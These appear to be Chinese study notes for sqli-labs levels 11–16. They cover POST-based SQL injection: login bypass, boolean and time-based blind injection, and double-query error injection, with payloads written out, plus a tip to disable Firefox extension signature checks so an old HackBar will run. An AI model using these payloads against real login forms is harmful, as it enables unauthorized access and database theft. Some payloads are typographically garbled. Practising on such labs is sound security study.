0x01 Firefox插件使用

新版FIREfox hackbar无法正常使用。
1.下载firefox for xp
2.下载旧版 HACKbar
3.地址栏输入about:config，搜索xpinstall.signatures.required，右键，切换，值改为false，即可。

0x02 POST注入

• less-11
  username 与 password 都正确返回登入成功信息>>查询语句WHERE为真就会执行sql语句
  构造payload:
  username=admin'#
password=123
  
  爆库
  
  BOOL注入
  uname=-1’ or if(ascii(substr(database(),1,1))=114,1,sleep(5))#
  
  XML函数报错
  

• less-12
  构造payload: d”) or 1=1#
  其他与less11相同

• less-13
  要求使用双查询注入
  构造payload : uname=1’) or 1=1#
  为了更直观直接 在源代码中echo $sql语句
  POST data : uname=1’) union select count(),concat(0x7e,(select database()),0x7e,floor(rand(0)2))x from information_schema.tables group by x#&passwd=&submit=Submit
  

• less-14
  与less-13相同，payload ： 1” or 1=1#

• less-15
  无回显错误信息，基于布尔时间的报错
  payload:1’ or 1=1#
  uname=1’ or if(ascii(substr((select table_name from information_schema.tables where database() limit 0,1),1,1))=115,1,sleep(5))#&passwd=1&submit=Submit
  

• less-16
  与less-15相同 不同payload为 : 1”) or 1=1#